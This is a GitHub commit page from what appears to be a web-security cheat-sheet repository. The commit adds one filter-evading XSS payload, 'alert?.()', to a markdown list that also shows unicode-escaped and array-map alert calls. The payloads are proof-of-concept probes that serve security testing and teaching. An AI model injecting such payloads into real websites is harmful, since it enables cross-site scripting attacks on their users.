Skip to content

Commit

Permalink
add one XSS payload
Browse files Browse the repository at this point in the history
  • Loading branch information
xanhacks committed May 23, 2024
1 parent 0baedd9 commit 9fc431d
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions content/docs/client-side/xss.md
Original file line number Diff line number Diff line change
Expand Up @@ -55,6 +55,7 @@ alert`1`
<!-- Alternate calls -->
["XSS"].map(alert)
\u0061\u006C\u0065\u0072\u0074("XSS")
alert?.()
```

### Variable self
Expand Down

0 comments on commit 9fc431d

Please sign in to comment.